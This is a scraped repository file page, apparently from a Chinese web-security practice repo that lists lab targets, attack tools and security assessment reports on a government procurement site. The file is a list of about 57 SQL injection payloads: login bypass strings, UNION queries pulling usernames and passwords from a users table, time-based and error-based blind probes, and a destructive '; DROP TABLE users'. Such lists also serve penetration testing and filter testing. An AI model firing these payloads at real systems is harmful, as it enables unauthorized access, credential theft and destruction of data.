cda31e86c7
- 靶场环境: DVWA/WebGoat/Pikachu/BWAPP/SQLi-Labs/XSS-Labs - SQL注入工具: sqli-scanner.py, blind-sqli.py, sqli-exploit.go - XSS工具: xss-fuzzer.py, xss-scanner.go - 认证攻击: web-brute.py, jwt-cracker.py - 服务端安全: port-scanner.py, tls-scanner.py - 防御配置: nginx-hardening.conf - 案例研究: 福建政采网安全评估报告 (13份) - 同步脚本: sync-gitea.sh
57 行
1.3 KiB
Plaintext
57 行
1.3 KiB
Plaintext
' OR '1'='1
|
|
' OR '1'='1'-- -
|
|
' OR '1'='1'/*
|
|
' OR 1=1--
|
|
' OR 1=1-- -
|
|
' OR 1=1/*
|
|
1' OR '1'='1
|
|
1' OR '1'='1'-- -
|
|
1' OR '1'='1'/*
|
|
admin'--
|
|
admin'-- -
|
|
admin'/*
|
|
' AND 1=1--
|
|
' AND 1=1-- -
|
|
' AND 1=2--
|
|
' AND 1=2-- -
|
|
' UNION SELECT NULL--
|
|
' UNION SELECT NULL-- -
|
|
' UNION SELECT NULL, NULL--
|
|
' UNION SELECT NULL, NULL, NULL--
|
|
' UNION SELECT 1,2,3--
|
|
' UNION SELECT username,password,3 FROM users--
|
|
' UNION ALL SELECT NULL--
|
|
' UNION ALL SELECT 1,2,3--
|
|
1' ORDER BY 1-- -
|
|
1' ORDER BY 2-- -
|
|
1' ORDER BY 3-- -
|
|
1' ORDER BY 4-- -
|
|
-1' UNION SELECT 1,2,3-- -
|
|
-1' UNION SELECT username,password,3 FROM users-- -
|
|
' AND SLEEP(5)--
|
|
' AND SLEEP(5)-- -
|
|
' AND IF(1=1,SLEEP(5),0)--
|
|
' AND IF(1=1,SLEEP(5),0)-- -
|
|
' AND BENCHMARK(10000000,SHA1('test'))--
|
|
' AND BENCHMARK(10000000,SHA1('test'))-- -
|
|
' WAITFOR DELAY '0:0:5'--
|
|
' WAITFOR DELAY '0:0:5'-- -
|
|
' AND pg_sleep(5)--
|
|
' AND pg_sleep(5)-- -
|
|
'; DROP TABLE users--
|
|
'; DROP TABLE users-- -
|
|
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
|
|
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
|
|
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--
|
|
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
|
|
1 AND 1=1
|
|
1 AND 1=2
|
|
1 OR 1=1
|
|
1' AND '1'='1
|
|
1' AND '1'='2
|
|
" OR "1"="1
|
|
" OR 1=1--
|
|
') OR ('1'='1
|
|
') OR ('1'='1'-- -
|
|
') AND 1=1--
|
|
') AND 1=2-- |